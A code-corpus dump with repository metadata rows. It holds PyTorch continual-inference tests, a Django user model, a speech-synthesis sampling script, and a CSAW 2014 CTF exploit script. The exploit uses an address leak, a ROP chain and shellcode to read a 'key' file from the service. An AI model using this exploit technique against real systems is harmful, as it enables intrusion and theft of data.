    co_res = co.Residual(co_conv)

    # Target behavior: Discard outputs from temporal padding.
    target = conv(x) + x

    # forward
    assert torch.allclose(co_conv.forward(x) + x, target)
    assert torch.allclose(co_res.forward(x), target)

    # forward_steps over all but the last step
    assert torch.allclose(
        co_res.forward_steps(x[:, :, :-1], pad_end=False), target[:, :, :4]
    )

    # forward_step continues from the saved state
    assert torch.allclose(co_res.forward_step(x[:, :, -1]), target[:, :, -2])
def test_residual_shrink():
    """phantom_padding aligns the identity when the conv shrinks the sequence."""
    x = torch.arange(6, dtype=torch.float).reshape((1, 1, 6))
    conv = nn.Conv1d(1, 1, kernel_size=3, padding=0, bias=False)
    torch.nn.init.ones_(conv.weight)
    co_conv = co.Conv1d.build_from(conv)
    co_res = co.Residual(co_conv, phantom_padding=True)

    # The identity path is cropped to match the shrunken conv output.
    target = conv(x) + x[:, :, 1:-1]

    # forward
    assert torch.allclose(co_conv.forward(x) + x[:, :, 1:-1], target)
    assert torch.allclose(co_res.forward(x), target)

    # forward_step, frame by frame (placeholders are filtered out)
    collected = []
    for t in range(x.shape[2]):
        step_out = co_res.forward_step(x[:, :, t])
        if isinstance(step_out, torch.Tensor):
            collected.append(step_out)
    assert torch.allclose(torch.stack(collected, dim=2), target)

    # forward_steps after resetting state
    co_res.clean_state()
    assert torch.allclose(
        co_res.forward_steps(x[:, :, :-1], pad_end=False), target[:, :, :3]
    )

    # forward_step for the final frame
    assert torch.allclose(co_res.forward_step(x[:, :, -1]), target[:, :, -1])
def test_broadcast_reduce():
    """BroadcastReduce feeds all branches and sums their aligned outputs."""
    x = torch.arange(7, dtype=torch.float).reshape((1, 1, 7))
    c5 = co.Conv1d(1, 1, kernel_size=5, padding=2, bias=False)
    c3 = co.Conv1d(1, 1, kernel_size=3, padding=1, bias=False)
    c1 = co.Conv1d(1, 1, kernel_size=1, padding=0, bias=False)
    for branch in (c5, c3, c1):
        torch.nn.init.ones_(branch.weight)
    par = co.BroadcastReduce(OrderedDict([("c5", c5), ("c3", c3), ("c1", c1)]))

    # Aggregate properties follow the widest branch.
    assert par.stride == 1
    assert par.delay == 2
    assert par.padding == 2
    assert par.receptive_field == 5
    assert "BroadcastReduce(" in par.__repr__() and "reduce=" in par.__repr__()

    # forward
    out_all = par.forward(x)
    assert torch.allclose(
        out_all, torch.tensor([[[4.0, 10.0, 18.0, 27.0, 36.0, 38.0, 32.0]]])
    )

    # forward_step: the first `delay` outputs are placeholders.
    out_steps = [par.forward_step(x[:, :, i]) for i in range(x.shape[2])]
    assert all(isinstance(o, TensorPlaceholder) for o in out_steps[: par.delay])
    stacked = torch.stack(out_steps[par.delay :], dim=2)
    assert torch.allclose(stacked, out_all[:, :, : -par.delay])

    # forward_steps without end padding, then a continuation step.
    par.clean_state()
    steps_no_update = par.forward_steps(
        x[:, :, :-1], pad_end=False, update_state=False
    )
    steps = par.forward_steps(x[:, :, :-1], pad_end=False)
    assert torch.allclose(steps, steps_no_update)
    assert torch.allclose(steps, out_all[:, :, : -par.delay - 1])
    step_no_update = par.forward_step(x[:, :, -1], update_state=False)
    step = par.forward_step(x[:, :, -1])
    assert torch.allclose(step, step_no_update)
    assert torch.allclose(step, out_all[:, :, -par.delay - 1])

    # forward_steps with pad_end reproduces the full clip-wise output.
    par.clean_state()
    assert torch.allclose(par.forward_steps(x, pad_end=True), out_all)
def test_flat_state_dict():
    """state_dict(flatten=True) drops auto-generated numeric prefixes from
    unnamed containers while keeping user-given names (OrderedDict keys);
    load_state_dict(..., flatten=True) and the flat_state_dict context
    manager invert that mapping."""
    # >> Part 1: Save both flat and original state dicts
    # If modules are not named, the numeric prefix can be flattened away.
    seq_to_flatten = co.Sequential(nn.Conv1d(1, 1, 3))
    sd = seq_to_flatten.state_dict()
    assert set(sd) == {"0.weight", "0.bias"}
    sd_flat = seq_to_flatten.state_dict(flatten=True)
    assert set(sd_flat) == {"weight", "bias"}

    # Explicitly named modules keep their name even when flattening.
    seq_not_to_flatten = co.Sequential(OrderedDict([("c1", nn.Conv1d(1, 1, 3))]))
    sd_no_flat = seq_not_to_flatten.state_dict(flatten=True)
    assert set(sd_no_flat) == {"c1.weight", "c1.bias"}

    # A nested example:
    nested = co.BroadcastReduce(seq_to_flatten, seq_not_to_flatten)
    sd = nested.state_dict()
    assert set(sd) == {"0.0.weight", "0.0.bias", "1.c1.weight", "1.c1.bias"}
    sd_flat = nested.state_dict(flatten=True)
    assert set(sd_flat) == {"weight", "bias", "c1.weight", "c1.bias"}

    # >> Part 2: Load flat state dict into a freshly initialized copy.
    nested_new = co.BroadcastReduce(
        co.Sequential(nn.Conv1d(1, 1, 3)),
        co.Sequential(OrderedDict([("c1", nn.Conv1d(1, 1, 3))])),
    )
    # Fresh random init: parameters differ before loading ...
    assert not torch.equal(nested[0][0].weight, nested_new[0][0].weight)
    assert not torch.equal(nested[0][0].bias, nested_new[0][0].bias)
    assert not torch.equal(nested[1].c1.weight, nested_new[1].c1.weight)
    assert not torch.equal(nested[1].c1.bias, nested_new[1].c1.bias)

    # ... and match afterwards.
    nested_new.load_state_dict(sd_flat, flatten=True)
    assert torch.equal(nested[0][0].weight, nested_new[0][0].weight)
    assert torch.equal(nested[0][0].bias, nested_new[0][0].bias)
    assert torch.equal(nested[1].c1.weight, nested_new[1].c1.weight)
    assert torch.equal(nested[1].c1.bias, nested_new[1].c1.bias)

    # >> Part 3: Test context manager
    with co.utils.flat_state_dict:
        # Export works as above despite `flatten=False`
        sd_flat2 = nested.state_dict(flatten=False)
        assert sd_flat.keys() == sd_flat2.keys()
        assert all(torch.equal(sd_flat[key], sd_flat2[key]) for key in sd_flat.keys())

        # Loading works as above despite `flatten=False`
        nested_new.load_state_dict(sd_flat, flatten=False)
        assert torch.equal(nested[0][0].weight, nested_new[0][0].weight)
        assert torch.equal(nested[0][0].bias, nested_new[0][0].bias)
        assert torch.equal(nested[1].c1.weight, nested_new[1].c1.weight)
        assert torch.equal(nested[1].c1.bias, nested_new[1].c1.bias)

    assert True  # Need to step down here to trigger context manager __exit__
def test_conditional_only_first():
    """A Conditional with only an if-true branch applies that branch when the
    predicate holds and otherwise acts as the identity, in all three modes."""
    inp = torch.ones((1, 1, 3))

    def pred(module, *args):
        return module.training

    cond = co.Conditional(pred, co.Multiply(2))

    # Predicate true (training mode): the Multiply(2) branch is applied.
    cond.train()
    for fwd, arg in (
        (cond.forward, inp),
        (cond.forward_steps, inp),
        (cond.forward_step, inp[:, :, 0]),
    ):
        assert torch.equal(fwd(arg), arg * 2)

    # Predicate false (eval mode): input passes through unchanged.
    cond.eval()
    for fwd, arg in (
        (cond.forward, inp),
        (cond.forward_steps, inp),
        (cond.forward_step, inp[:, :, 0]),
    ):
        assert torch.equal(fwd(arg), arg)
def test_conditional_both_cases():
    """A Conditional with both branches selects branch 0 when the predicate
    holds and branch 1 otherwise, consistently across all execution modes."""
    data = torch.ones((1, 1, 3))

    def is_training(module, *args):
        # The function name is rendered verbatim in Conditional.__repr__.
        return module.training

    branch = co.Conditional(is_training, co.Multiply(2), co.Multiply(3))
    assert branch.receptive_field == 1
    expected_repr = """Conditional(\n predicate=is_training\n (0): Lambda(_multiply, takes_time=True)\n (1): Lambda(_multiply, takes_time=True)\n)"""
    assert branch.__repr__() == expected_repr

    # Training: branch 0 (multiply by 2) is selected.
    branch.train()
    for fwd, arg in (
        (branch.forward, data),
        (branch.forward_steps, data),
        (branch.forward_step, data[:, :, 0]),
    ):
        assert torch.equal(fwd(arg), arg * 2)

    # Eval: branch 1 (multiply by 3) is selected.
    branch.eval()
    for fwd, arg in (
        (branch.forward, data),
        (branch.forward_steps, data),
        (branch.forward_step, data[:, :, 0]),
    ):
        assert torch.equal(fwd(arg), arg * 3)
def test_conditional_delay():
    """Both Conditional branches are aligned to the larger of the two
    branch delays, regardless of which side is the slower one."""
    for true_delay, false_delay in ((2, 3), (3, 2)):
        cond = co.Conditional(
            lambda a, b: True, co.Delay(true_delay), co.Delay(false_delay)
        )
        # The shorter branch is padded up to the maximum delay (3).
        assert cond.delay == 3
        assert cond._modules["0"].delay == 3
        assert cond._modules["1"].delay == 3
def test_condition_torch_modules():
    """Plain torch.nn modules are accepted as Conditional branches and are
    listed in the container's repr along with the predicate's source."""
    cond = co.Conditional(
        lambda a, b: True,
        torch.nn.Sigmoid(),
        torch.nn.Softmax(),
    )
    expected = "Conditional(\n predicate=lambda a, b: True\n (0): Sigmoid()\n (1): Softmax(dim=None)\n)"
    assert cond.__repr__() == expected
def test_broadcast():
    """Broadcast duplicates its input into N parallel streams with zero
    delay, identically in every execution mode."""
    payload = 42
    bc = co.Broadcast(2)
    assert bc.delay == 0
    for fn in (bc.forward, bc.forward_step, bc.forward_steps):
        assert fn(payload) == [payload, payload]
def test_parallel():
    """co.Parallel applies one module per input stream; container delay,
    padding and stride are aggregated from the branches (largest wins)."""
    x = torch.randn((1, 1, 3))
    xx = [x, x]
    c3 = co.Conv1d(1, 1, kernel_size=3, padding=1, bias=False)
    c1 = co.Conv1d(1, 1, kernel_size=1, padding=0, bias=False)
    par = co.Parallel(OrderedDict([("c3", c3), ("c1", c1)]))
    # Aggregated properties follow the larger branch (c3).
    assert par.delay == 1
    assert par.padding == 1
    assert par.stride == 1

    # forward: each output stream equals its branch applied independently.
    o1 = par.forward(xx)
    assert torch.equal(c3.forward(x), o1[0])
    assert torch.equal(c1.forward(x), o1[1])

    # forward_steps with update_state=False must not disturb internal state.
    o2 = par.forward_steps(xx, pad_end=True, update_state=False)
    assert torch.equal(c3.forward_steps(x, pad_end=True), o2[0])
    assert torch.equal(c1.forward_steps(x, pad_end=True), o2[1])

    # forward_step: prime state with step 0, then peek at step 1 without
    # committing it. The c1 branch lags by the auto-inserted delay.
    par.clean_state()
    par.forward_step([x[:, :, 0], x[:, :, 0]], update_state=True)
    o3 = par.forward_step([x[:, :, 1], x[:, :, 1]], update_state=False)
    assert torch.equal(c3.forward_step(x[:, :, 1]), o3[0])
    assert torch.equal(c1.forward_step(x[:, :, 0]), o3[1])  # x[:,:,0] due to auto delay
def test_reduce():
    """Reduce("sum") adds the corresponding tensors of a list input, with no
    delay, in every execution mode."""
    t = torch.tensor([[[1.0, 2.0]]])
    doubled = torch.tensor([[[2.0, 4.0]]])

    red = co.Reduce("sum")
    assert red.delay == 0
    assert torch.equal(red.forward([t, t]), doubled)
    assert torch.equal(red.forward_steps([t, t]), doubled)
    assert torch.equal(
        red.forward_step([t[:, :, 0], t[:, :, 0]]), torch.tensor([[2.0]])
    )
def test_parallel_sequential():
    """BroadcastReduce(convs, reduce="sum") is equivalent to the explicit
    pipeline Broadcast -> Parallel(convs) -> Reduce("sum")."""
    x = torch.arange(7, dtype=torch.float).reshape((1, 1, 7))

    def ones_convs():
        # Fresh all-ones convolutions with "same" padding for kernels 5/3/1.
        convs = []
        for kernel, pad in ((5, 2), (3, 1), (1, 0)):
            conv = co.Conv1d(1, 1, kernel_size=kernel, padding=pad, bias=False)
            torch.nn.init.ones_(conv.weight)
            convs.append(conv)
        return convs

    # First implementation: fused broadcast-reduce container.
    mod1 = co.BroadcastReduce(*ones_convs(), reduce="sum")

    # Second implementation: the same computation spelled out step by step.
    mod2 = co.Sequential(
        co.Broadcast(),  # Sequential can infer broadcast dimensions
        co.Parallel(*ones_convs()),
        co.Reduce("sum"),
    )

    # Compare the two on the same clip.
    o1 = mod1.forward(x)
    o2 = mod2.forward(x)
    assert torch.equal(o1, o2)
def test_parallel_dispatch():
    """ParallelDispatch reroutes list elements according to a (possibly
    nested) index mapping, identically in all three execution modes."""
    # Mapping entries must be ints or nested int lists.
    with pytest.raises(AssertionError):
        co.ParallelDispatch([1.0, "nah"])

    dispatch = co.ParallelDispatch([2, 0, [0, 2], 2])
    source = [10, 11, 12]
    expected = [12, 10, [10, 12], 12]
    assert dispatch.forward(source) == expected
    assert dispatch.forward_step(source) == expected
    assert dispatch.forward_steps(source) == expected
| 31.52514 | 143 | 0.624845 |
abf8894b09295d75fbe3b3b420d30f7d1212e4ff | 257 | py | Python | authentication/models.py | mzazakeith/Therapy101 | be00dd988c6b636f52b57638e70c89da3acbf1a3 | [
"MIT"
] | null | null | null | authentication/models.py | mzazakeith/Therapy101 | be00dd988c6b636f52b57638e70c89da3acbf1a3 | [
"MIT"
] | 15 | 2020-06-05T18:55:18.000Z | 2022-03-08T22:20:14.000Z | authentication/models.py | mzazakeith/Therapy101 | be00dd988c6b636f52b57638e70c89da3acbf1a3 | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
from django.db import models
class User(AbstractUser):
    """Project user model extending Django's AbstractUser with role flags.

    Roles are independent booleans; nothing here enforces that only one
    flag is set per user.
    """

    # Role flags -- presumably SLTA = speech-language therapy assistant and
    # SLT = speech-language therapist; TODO confirm against project docs.
    is_slta = models.BooleanField(default=False)
    is_slt = models.BooleanField(default=False)
    is_parent = models.BooleanField(default=False)
abf9214c7a6d2106de8bbc2f4be984b13c38f4bf | 10,200 | py | Python | parrot/sample.py | weixsong/Codeblock | 413e7acd6addc4950bffe2d57eb0cc7973c6fb7a | [
"MIT"
] | null | null | null | parrot/sample.py | weixsong/Codeblock | 413e7acd6addc4950bffe2d57eb0cc7973c6fb7a | [
"MIT"
] | null | null | null | parrot/sample.py | weixsong/Codeblock | 413e7acd6addc4950bffe2d57eb0cc7973c6fb7a | [
"MIT"
] | null | null | null | """Sampling code for the parrot.
Loads the trained model and samples.
"""
import numpy
import os
import cPickle
import logging
from blocks.serialization import load_parameters
from blocks.model import Model
from datasets import parrot_stream
from model import Parrot
from utils import (
attention_plot, sample_parse, create_animation, numpy_one_hot)
from generate import generate_wav
logging.basicConfig()
data_dir = os.environ['FUEL_DATA_PATH']
args = sample_parse()
with open(os.path.join(
args.save_dir, 'config',
args.experiment_name + '.pkl')) as f:
saved_args = cPickle.load(f)
assert saved_args.dataset == args.dataset
if args.use_last:
params_mode = 'last_'
else:
params_mode = 'best_'
args.samples_name = params_mode + args.samples_name
with open(os.path.join(
args.save_dir, "pkl",
params_mode + args.experiment_name + ".tar"), 'rb') as src:
parameters = load_parameters(src)
# Build a test-split stream providing labels, masks and (optionally) raw
# audio for conditioning the sampler.
test_stream = parrot_stream(
    args.dataset, saved_args.use_speaker, ('test',), args.num_samples,
    args.num_steps, sorting_mult=1, labels_type=saved_args.labels_type,
    raw_data=args.plot_raw)

data_tr = next(test_stream.get_epoch_iterator())
data_tr = {
    source: data for source, data in zip(test_stream.sources, data_tr)}
print "Loaded sources from test_stream: ", data_tr.keys()

# Not every source is guaranteed to be present (depends on dataset/options),
# hence the .get(..., None) defaults.
features_tr = data_tr.get('features', None)
features_mask_tr = data_tr.get('features_mask', None)
speaker_tr = data_tr.get('speaker_index', None)
labels_tr = data_tr.get('labels', None)
labels_mask_tr = data_tr.get('labels_mask', None)
start_flag_tr = data_tr.get('start_flag', None)
raw_audio_tr = data_tr.get('raw_audio', None)

# Optionally replace the stream's speakers with random ones (fixed seed for
# reproducibility). Index 0 is excluded -- presumably reserved (the --mix
# branch below writes a blended embedding into row 0); TODO confirm.
if args.random_speaker:
    numpy.random.seed(1)
    speaker_tr = numpy.random.random_integers(
        1, saved_args.num_speakers - 1, (args.num_samples, 1))
    speaker_tr = numpy.int8(speaker_tr)

# Optionally synthesize a user-provided phrase instead of the test labels.
if args.phrase is not None:
    import pickle
    data_path = os.environ['FUEL_DATA_PATH']
    char2code_path = os.path.join(data_path, args.dataset, 'char2code.pkl')
    with open(char2code_path, 'r') as f:
        char2code = pickle.load(f)
    labels_tr = numpy.array([char2code[x] for x in args.phrase], dtype='int8')
    labels_tr = numpy.tile(labels_tr, (args.num_samples, 1))
    labels_mask_tr = numpy.ones(labels_tr.shape, dtype='float32')

# Force one speaker id for all samples.
if args.speaker_id and saved_args.use_speaker:
    speaker_tr = speaker_tr * 0 + args.speaker_id

# Interpolate between two hard-coded speaker embeddings (rows 15 and 11)
# and store the blend in embedding 0, which every sample then uses.
if args.mix and saved_args.use_speaker:
    speaker_tr = speaker_tr * 0
    parameters['/parrot/lookuptable.W'][0] = \
        args.mix * parameters['/parrot/lookuptable.W'][15] + \
        (1 - args.mix) * parameters['/parrot/lookuptable.W'][11]
# Set default values for old config files that predate some options.
# if not hasattr(saved_args, 'weak_feedback'):
#     saved_args.weak_feedback = False
# if not hasattr(saved_args, 'full_feedback'):
#     saved_args.full_feedback = False

if not hasattr(saved_args, 'raw_output'):
    saved_args.raw_output = False

# Rebuild the model exactly as trained; only the sampling-time knobs
# (bias, sharpening, timing coefficients) come from the command line.
parrot_args = {
    'input_dim': saved_args.input_dim,
    'output_dim': saved_args.output_dim,
    'rnn_h_dim': saved_args.rnn_h_dim,
    'readouts_dim': saved_args.readouts_dim,
    'weak_feedback': saved_args.weak_feedback,
    'full_feedback': saved_args.full_feedback,
    'feedback_noise_level': None,
    'layer_norm': saved_args.layer_norm,
    'use_speaker': saved_args.use_speaker,
    'num_speakers': saved_args.num_speakers,
    'speaker_dim': saved_args.speaker_dim,
    'which_cost': saved_args.which_cost,
    'num_characters': saved_args.num_characters,
    'attention_type': saved_args.attention_type,
    'attention_alignment': saved_args.attention_alignment,
    'sampling_bias': args.sampling_bias,
    'sharpening_coeff': args.sharpening_coeff,
    'timing_coeff': args.timing_coeff,
    'encoder_type': saved_args.encoder_type,
    'raw_output': saved_args.raw_output,
    'name': 'parrot'}

parrot = Parrot(**parrot_args)

features, features_mask, labels, labels_mask, speaker, start_flag, raw_audio = \
    parrot.symbolic_input_variables()

# Building the cost graph instantiates all parameters so the saved values
# can be loaded into the model below.
cost, extra_updates, attention_vars, cost_raw = parrot.compute_cost(
    features, features_mask, labels, labels_mask,
    speaker, start_flag, args.num_samples, raw_audio=raw_audio)

model = Model(cost)
model.set_parameter_values(parameters)
print "Successfully loaded the parameters."
# Sample either by teacher-forcing one step at a time on the real data, or
# by free-running generation conditioned on labels/speaker.
if args.sample_one_step:
    gen_x, gen_k, gen_w, gen_pi, gen_phi, gen_pi_att = \
        parrot.sample_using_input(data_tr, args.num_samples)
else:
    gen_x, gen_k, gen_w, gen_pi, gen_phi, gen_pi_att = parrot.sample_model(
        labels_tr, labels_mask_tr, features_mask_tr,
        speaker_tr, args.num_samples, args.num_steps)

print "Successfully sampled the parrot."

# Move the batch axis first for per-sample processing below.
gen_x = gen_x.swapaxes(0, 1)
gen_phi = gen_phi.swapaxes(0, 1)

features_lengths = []
labels_lengths = []
for idx in range(args.num_samples):
    # Heuristic for deciding when to end the sampling: stop at the first
    # timestep where the attention weight on the final label exceeds the
    # weight on every earlier label, then allow a little extra time.
    this_phi = gen_phi[idx]
    this_labels_length = int(labels_mask_tr[idx].sum())
    try:
        this_features_length = numpy.where((
            this_phi[:, this_labels_length, numpy.newaxis] >
            this_phi[:, :this_labels_length-1]).all(axis=1))[0][0]
        this_features_length = numpy.minimum(
            args.num_steps, this_features_length + 40)  # Small extra time.
    except:
        # NOTE(review): bare except -- hit when the condition never triggers
        # (e.g. numpy.where returns empty); falls back to the full length.
        print "Its better to increase the number of samples."
        this_features_length = args.num_steps
    features_lengths.append(this_features_length)
    labels_lengths.append(this_labels_length)
# Optionally let the raw-audio head (SampleRNN-style) write raw waveforms.
if saved_args.raw_output:
    print "Sampling and saving raw audio..."
    to_save_path = os.path.join(args.save_dir, 'samples', 'new_raw')
    if not os.path.exists(to_save_path):
        os.makedirs(to_save_path)
    parrot.sampleRnn.sample_raw(gen_x.swapaxes(0, 1).copy(), features_lengths, args.samples_name, to_save_path)
    print "Successfully sampled raw audio..."

# Normalization statistics required by the vocoder pipeline.
norm_info_file = os.path.join(
    data_dir, args.dataset,
    'norm_info_mgc_lf0_vuv_bap_63_MVN.dat')

# Vocode each generated sample (trimmed to its detected length) to a wav.
for idx, this_sample in enumerate(gen_x):
    this_sample = this_sample[:features_lengths[idx]]
    generate_wav(
        this_sample,
        os.path.join(args.save_dir, 'samples'),
        args.samples_name + '_' + str(idx),
        sptk_dir=args.sptk_dir,
        world_dir=args.world_dir,
        norm_info_file=norm_info_file,
        do_post_filtering=args.do_post_filtering)

# Optionally dump the ground-truth raw audio for comparison.
# NOTE(review): the 80x factor presumably maps feature frames to raw-audio
# samples (frame hop of 80 at 16 kHz) -- confirm against the dataset code.
if args.plot_raw:
    from scipy.io import wavfile
    raw_audio = data_tr['raw_audio'].swapaxes(0, 1)
    for idx in range(args.num_samples):
        this_raw = numpy.concatenate(
            raw_audio[idx])[:80*int(features_mask_tr.sum(axis=0)[idx])]
        wavfile.write(
            os.path.join(
                args.save_dir, 'samples',
                'raw_' + args.samples_name + '_' + str(idx) + '.wav'),
            16000, this_raw)

# Optionally vocode the original (ground-truth) features as well.
if args.process_originals:
    assert not args.new_sentences
    for i, this_sample in enumerate(features_tr.swapaxes(0, 1)):
        this_sample = this_sample[:int(features_mask_tr.sum(axis=0)[i])]
        generate_wav(
            this_sample,
            os.path.join(args.save_dir, 'samples'),
            'original_' + args.samples_name + '_' + str(i),
            sptk_dir=args.sptk_dir,
            world_dir=args.world_dir,
            norm_info_file=norm_info_file,
            do_post_filtering=args.do_post_filtering)
# Render an attention plot per sample and collect the decoded label text.
all_text = []
for idx in range(args.num_samples):
    this_labels = labels_tr[idx, :labels_lengths[idx]]
    this_phi = gen_phi[idx][:features_lengths[idx], :labels_lengths[idx]]
    this_text = attention_plot(
        this_phi,
        os.path.join(
            args.save_dir, 'samples',
            args.samples_name + '_' + str(idx)),
        this_labels,
        args.dataset,
        saved_args.labels_type)
    this_text = ''.join(this_text)
    all_text.append(this_text + '\n')

# Save the texts of all samples next to the generated audio.
with open(
        os.path.join(
            args.save_dir, 'samples', args.samples_name + '.txt'),
        'w') as text_file:
    text_file.write(''.join(all_text).encode('utf8'))
# Optional diagnostic plots of all intermediate sampling variables.
if args.debug_plot:
    from utils import full_plot
    gen_k = gen_k.swapaxes(0, 1)
    gen_w = gen_w.swapaxes(0, 1)
    gen_pi = gen_pi.swapaxes(0, 1)
    gen_phi = gen_phi.swapaxes(0, 1)
    gen_pi_att = gen_pi_att.swapaxes(0, 1)

    for i in range(args.num_samples):
        # Trim every tensor to the valid (unmasked) length of sample i.
        this_num_steps = int(features_mask_tr.sum(axis=0)[i])
        this_labels_length = int(labels_mask_tr.sum(axis=1)[i])
        this_x = gen_x[i][:this_num_steps]
        this_k = gen_k[i][:this_num_steps]
        this_w = gen_w[i][:this_num_steps]
        this_pi = gen_pi[i][:this_num_steps]
        this_phi = gen_phi[i][:this_num_steps, :this_labels_length]
        this_pi_att = gen_pi_att[i][:this_num_steps]
        full_plot(
            [this_x, this_pi_att, this_k, this_w, this_phi],
            os.path.join(
                args.save_dir, 'samples',
                args.samples_name + '_' + str(i) + '.png'))

# Optional animations synchronized with the generated .wav files.
# NOTE(review): gen_k/gen_w/... are only batch-major if the debug_plot
# branch above already ran its swapaxes calls -- confirm upstream intent.
if args.animation:
    for i in range(args.num_samples):
        this_num_steps = int(features_mask_tr.sum(axis=0)[i])
        this_labels_length = int(labels_mask_tr.sum(axis=1)[i])
        this_x = gen_x[i][:this_num_steps]
        this_k = gen_k[i][:this_num_steps]
        this_w = gen_w[i][:this_num_steps]
        this_pi = gen_pi[i][:this_num_steps]
        this_phi = gen_phi[i][:this_num_steps, :this_labels_length]
        this_pi_att = gen_pi_att[i][:this_num_steps]
        create_animation(
            [this_x, this_pi_att, this_k, this_w, this_phi],
            args.samples_name + '_' + str(i) + '.wav',
            args.samples_name + '_' + str(i),
            os.path.join(args.save_dir, 'samples'))

    # NOTE(review): indentation reconstructed -- this block is taken to be
    # nested under args.animation (originals are animated only when both
    # flags are set); confirm against upstream history.
    if args.process_originals:
        for i in range(args.num_samples):
            this_num_steps = int(features_mask_tr.sum(axis=0)[i])
            this_x = features_tr[:, i][:this_num_steps]
            this_phoneme = labels_tr[:, i][:this_num_steps]
            create_animation(
                [this_x, numpy_one_hot(
                    this_phoneme, saved_args.num_characters)],
                'original_' + args.samples_name + '_' + str(i) + '.wav',
                'original_' + args.samples_name + '_' + str(i),
                os.path.join(args.save_dir, 'samples'))
| 35.172414 | 111 | 0.678824 |
abfa15dff9f5420c035b3826b1395528ac642299 | 3,517 | py | Python | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | 2 | 2015-03-24T22:20:08.000Z | 2018-05-12T16:41:13.000Z | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | null | null | null | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | null | null | null | import socket
import re
from struct import pack
from time import sleep
def recv_until(s, string=""):
text = ""
while 1 :
data = s.recv(4096)
text+=data
if not data or data.find(string) != -1:
break
return text
def leak(s):
s.send("A\n")
text = recv_until(s, "Selection:")
slide, stack = re.findall('0x[0-9a-f]{8}', text)
slide = int(slide, 16) + 0x400000
stack = int(stack, 16)
return (slide, stack)
def vuln(s, payload):
s.send("V\n")
recv_until(s, "(with some constraints).")
s.send(payload)
host = '192.168.0.10'
s=socket.create_connection((host, 9998))
recv_until(s, "Password:")
s.send('GreenhornSecretPassword!!!\n')
### leak
recv_until(s, 'Selection:')
slide, stack = leak(s)
VirtualAlloc = 0x11c0 + slide
memcpy = 0x1684 + slide
print_output = 0x14d0 + slide
pop4 = 0x199e + slide
ret = 0x19a2 + slide
eip_off = 0x404
buffer_start = stack - 0x3f8
shellcode_loc = buffer_start + 4
shellcode_len = 0x400
### ROP
"""cedcl_ convention"""
rop = [
VirtualAlloc, #wrapper
pop4,
0,
0x1000,
0x40,
buffer_start + eip_off + 4 * 8, #will stock ptr to alloc' zone in memcpy 1st arg
memcpy,
ret, #will return to 1st param
0xcccccccc,
shellcode_loc,
shellcode_len
]
shellcode = [0x55, 0x89, 0xE5, 0x81, 0xEC, 0x10, 0x00, 0x00, 0x00, 0x89, 0x45,
0xFC, 0x64, 0x8B, 0x1D, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x5B, 0x0C, 0x8B,
0x5B, 0x14, 0x8B, 0x1B, 0x8B, 0x1B, 0x8B, 0x5B, 0x10, 0x8B, 0x73, 0x3C,
0x01, 0xDE, 0x8B, 0x76, 0x78, 0x01, 0xDE, 0x56, 0x8B, 0x7E, 0x20, 0x01,
0xDF, 0x8B, 0x4E, 0x14, 0x31, 0xC0, 0x57, 0x51, 0x8B, 0x3F, 0x01, 0xDF,
0xBE, 0xFA, 0x00, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x31, 0xC9, 0xB1, 0x0E,
0xF3, 0xA6, 0x59, 0x5F, 0x74, 0x0B, 0x81, 0xC7, 0x04, 0x00, 0x00, 0x00,
0x40, 0xE2, 0xDF, 0x0F, 0x0B, 0x5E, 0x8B, 0x56, 0x24, 0x01, 0xDA, 0xD1,
0xE0, 0x01, 0xD0, 0x31, 0xC9, 0x66, 0x8B, 0x08, 0x8B, 0x46, 0x1C, 0x01,
0xD8, 0xC1, 0xE1, 0x02, 0x01, 0xC8, 0x8B, 0x10, 0x01, 0xDA, 0x5E, 0x89,
0xF7, 0x31, 0xC9, 0x89, 0x55, 0xF8, 0x89, 0x5D, 0xF4, 0xBE, 0x09, 0x01,
0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF, 0x75, 0xF4, 0xFF, 0x55, 0xF8,
0x89, 0xC3, 0x68, 0x6B, 0x65, 0x79, 0x00, 0x89, 0xE0, 0x68, 0x00, 0x00,
0x00, 0x00, 0x68, 0x80, 0x00, 0x00, 0x00, 0x68, 0x03, 0x00, 0x00, 0x00,
0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x01, 0x00, 0x00, 0x00, 0xB9, 0x00,
0x00, 0x00, 0x80, 0x51, 0x50, 0xFF, 0xD3, 0x81, 0xC4, 0x04, 0x00, 0x00,
0x00, 0x50, 0xBE, 0x15, 0x01, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF,
0x75, 0xF4, 0xFF, 0x55, 0xF8, 0x5B, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00,
0x89, 0xE1, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00,
0x68, 0x00, 0x01, 0x00, 0x00, 0x51, 0x53, 0xFF, 0xD0, 0x8B, 0x45, 0xFC,
0x8B, 0x80, 0x1E, 0x01, 0x00, 0x00, 0x54, 0xFF, 0xD0, 0x0F, 0x0B, 0x47,
0x65, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x41, 0x64, 0x64, 0x72, 0x65, 0x73,
0x73, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65,
0x41, 0x00, 0x52, 0x65, 0x61, 0x64, 0x46, 0x69, 0x6C, 0x65, 0x00,
# exclude last 4 bytes since we want to replace them
0xCC, 0xCC, 0xCC, 0xCC, ][:-4]
exploit = "CSAW" #mandatory
exploit += "".join([chr(c) for c in shellcode])
exploit += pack("<I", print_output) #print result of ReadFile back to us
exploit += "\xcc"*(eip_off - len(exploit))
exploit += "".join([pack("<I", dword) for dword in rop])
vuln(s, exploit)
s.shutdown(socket.SHUT_WR)
sleep(1)
print s.recv(1024)
| 33.179245 | 88 | 0.639181 |
abfa9fcc8c8d6fc061a4cea57ebd8295d4f79af3 | 9,504 | py | Python | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy1.7 | 25a95ba63c7797e92ba45450d79ee1326135fb47 | [
"MIT"
